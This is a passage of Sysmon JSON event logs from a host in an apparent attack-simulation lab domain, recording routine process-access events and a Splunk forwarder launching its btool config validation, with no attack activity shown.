C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1946,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1947,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1948,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-00105AD50300}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-00105AD50300}","TargetProcessId":"3908","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1949,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.668\r\nProcessGuid: {A837DB8D-01C8-5F25-0000-001012D60300}\r\nProcessId: 3948\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-strptime --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01C8-5F25-0000-00105AD50300}\r\nParentProcessId: 3908\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.668","ProcessGuid":"{A837DB8D-01C8-5F25-0000-001012D60300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-strptime --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01C8-5F25-0000-00105AD50300}","ParentProcessId":"3908","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1950,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01C8-5F25-0000-00105AD50300}\r\nSourceProcessId: 3908\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-001012D60300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01C8-5F25-0000-00105AD50300}","SourceProcessId":"3908","SourceThreadId":"3916","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-001012D60300}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1951,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-001012D60300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-001012D60300}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1952,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1953,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1954,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 